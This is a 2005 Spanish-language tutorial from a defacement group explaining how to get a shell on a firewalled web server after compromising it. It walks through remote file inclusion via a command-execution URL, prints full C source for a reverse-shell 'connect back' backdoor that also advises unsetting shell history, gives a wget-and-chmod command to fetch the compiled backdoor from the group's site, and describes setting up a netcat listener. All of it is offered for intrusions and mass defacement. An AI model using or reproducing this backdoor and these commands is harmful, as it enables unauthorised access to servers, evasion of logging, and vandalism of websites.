############################################################################
sh-2.05# ./ Escrito por Status-x [
[email protected] ] - Mexico
############################################################################
********************************************** ******************************
[ Contenido ]
[ 1 ] .- Introduccion.............................................. Status-x
[ 2 ] .- Backdoors................................................. Status-x
[ 3 ] .- Conexion Reversa.......................................... Status-x
[ 4 ] .- Despedida................................................. Status-x
****************************************************************************
########################################## ##################################
sh-2.05# ./ Introduccion
############################################################################
Que onda, seguramente muchas veces a algunos ustedes el backdoor de su
preferencia no les conecta, bien esto significa que el servidor tiene fire
wall y por lo tanto no acepta conexiones por los distintos puertos que los
backdoors usan, es por eso que veremos como conectarnos aunque el servidor
tenga firewall, para eso utilizaremos un backdoor de conexion reversa que es
mucho mas amigable que trabajar con netcat :)
############################################################################
sh-2.05# ./ Backdoors
############################################################################
r0nin, vaya backdoor jejejeje seguramente muchos solo conocen ese, se han
quedado estancados ahi, al leer un tuto y hacer su primer deface ya son
elites y van presumiendo por distintas webs que saben hacer un deface sin
embargo creo que solo se conforman con hacer su index
------------------------------
echo Yo soy hax0r >index.html
------------------------------
Bien, un backdoor como su nombre lo indica en español es una aplicacion que
nos abrira una puerta trasera por la cual entrar, similar en funcionamiento
a los clasicos troyanos, hay distintos backdoors y hay algunos que solo fun
cionan con determinado OS, esto quiere decir que para cada Os podria haber
un backdoor, en este caso usaremos un backdoor normal cuyo autor es
Innocent Boys de Brazil.
Comenzaremos haciendo que el backdoor haga su funcion abrirnos un puerto
,bien en este caso el backdoor me habre una puerta en el 9865
En un ejecutor de comandos correremos el backdoor:
---------------------------------------------------------------------------
http://localhost/index.php?pagina=http://mx.geocities.com/razorkron/cmd.txt
?&cmd=cd /tmp;./backdoor
Innocent Boys Backdoor
Binding the 9865
OK, pid = 30584
---------------------------------------------------------------------------
Ahora nos trataremos de conectar por el putty o con telnet:
-----------------------------------------------
telnet:localhost:9865
-----------------------------------------------
S in embargo vemos que no nos da la shell, esto quiere decir que tendremos
que echar mano de un backdoor especial que sirve para hacer conexion reversa
y nos conectara aunque el servidor tenga firewall :)
############################################################################
sh-2.05# ./ Conexion Reversa
############################################################################
Para conectarnos usaremos un backdoor de conexion reversa, llamado ConnectBack
Backdoor, :) a continuacion su codigo fuente
------------------------ COTAR AQUI ---------------------------------
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f; int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Connect Back Shell "
"Issue \"export TERM=xterm; exec bash -i\" "
"For More Reliable Shell. "
"Issue \"unset HISTFILE; unset SAVEHIST\" "
"For Not Getting Logged. (; ";
printf("Connect Back Backdoor ");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port> ", argv[0]);
return 1;
}
printf("
- Dumping Arguments ");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name ");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory ");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number ");
return 1;
}
}
printf(" - Resolving Host Name ");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s ", host)
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf(" - Connecting... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error ");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect ");
return 1;
}
printf(" - Spawning Shell ");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork ");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf(" - Detached ");
return 0;
}0; }
------------------------------------------------------------------------
Este backdoor nos permitira conectarnos aunque el server tenga firewall
sin embargo el backdoor solo funcionara si tenemos una conexion por
Dial Up ya que he testeado con ADSL y no funciona ;)
Para descargar el backdoor ya compilado:
-------------------------------
http://defacersmexico.org/bd/dc
-------------------------------
Bien empezemos:
En nuestro ejecutor de comandos nos cambiaremos a un directorio con
permisos de escritura, ya explique como se hace eso :), y despues
subiremos el backdoor :) y le daremos permisos 777
----------------------------------------------------
cd /dir/;wget defacersmexico.org/bd/dc; chmod 777 dc
----------------------------------------------------
La siguiente herramienta que utilizaremos para poder conectarnos
al servidor sera netcat, que servira como programa escucha y ahi
recibiremos la shell.
En dado caso que estemos bajo Windows haremos lo siguiente en
nuestra linea de comandos :) ejecutaremos nuestro netcat:
------------------------------------------
Microsoft Windows XP [Versión 5.1.2600]
(c) Copyright 1985-2001 Microsoft Corp. <-------ejecutamos Netcat
C:\Documents and Settings\Status-x>nc
Cmd line:
-------------------------------------------
Nos saldra algo como Cmd line: aqui especificaremos el comando
para que Netcat se ponga a la escucha y podamos obtener la shell :)
el comando que pondremos sera:
--------------------
-vv -l -p puerto
--------------------
Y si lo hicimos bien en el netcat nos saldra lo siguiente:
-------------------------------------------
C:\Documents and Settings\Status-x>nc
Cmd line: -vv -l -p 80
listening on [any] 80 ...
-------------------------------------------
cabe mencionar que tendremos que desactivar nuestros firewall para
que podamos recibir la shell, esto involucra tambien desactivar
el servidor de seguridad de internet de microsoft, esto se hace asi:
------------------------------------------------------------------
Inicio > Conexiones de red > Tu Conexion > Propiedades > Avanzadas
------------------------------------------------------------------
Y ahi desactivas la palomita de hasta arriba
Entonces ya tenemos nuestro netcat a la escucha y lo unico que falta
es obtener la shell :), entonces nos vamos a nuestro ejecutor de
comandos y ejecutamos el backdoor:
--------------------
./dc
usage: ./dc <ip> <port>
--------------------
Ahora solo nos queda sustituir los valores que nos piden
IP - Tu ip
Port - Puerto que hayas especificado en el Netcat
En este caso yo especifique el puerto 80 y procedemos a ejecutarlo :)
-----------------------
./dc 200.145.23.34 80
|
| Tu IP
|
Backdoor Puerto
-----------------------
Si lo hicimos todo bien en el ejecutor de comandos nos debe salir algo como esto:
---------------------------
Connect Back Backdoor
- Dumping Arguments
- Resolving Host Name
- Connecting...
- Spawning Shell
- Detached
-----------------------------
y en el Netcat debe de haber aparecido la Shell!!!!!
Sin embargo si aparece esto:
-------------------------
Connect Back Backdoor
- Dumping Arguments
- Resolving Host Name
- Connecting...
[-] Unable to Connect
-------------------------
Quiere decir que tu red no acepta este tipo de conexion o que hiciste algo mal
, asi que checa tu IP, puerto, que el netcat este a la escucha, etc :)
Recomiendo utilizar puertos de servicios que no sean sospechosos y con mayor
probabilidad de que te conecten como: 80, 25, 15 ;)
############################################################################
sh-2.05# ./ Despedida
############################################################################
Bueno pues un tutorial mas, que estoy seguro les sera de ayuda a muchisimas
personas que creian perdido su mass defacement :) jjejejejeje, espero que
les haya gustado el tutorial si tienen dudas ya saben mi
mail: [email protected]
MSN: [email protected]
web: http://defacersmexico.org
Bye a todos ;)
un Saludo especial a Data Cha0s y Command Tribulation por facilitar las
herramientas y la shell en que fue testeado el backdoor ;)
############################################################################
sh-2.05b$ ./ exit
Copyright 2005 Defacers Mexico - No modificar sin permiso de su autor
Si publicas este texto en tu sitio por favor no lo modifiques ;)
############################################################################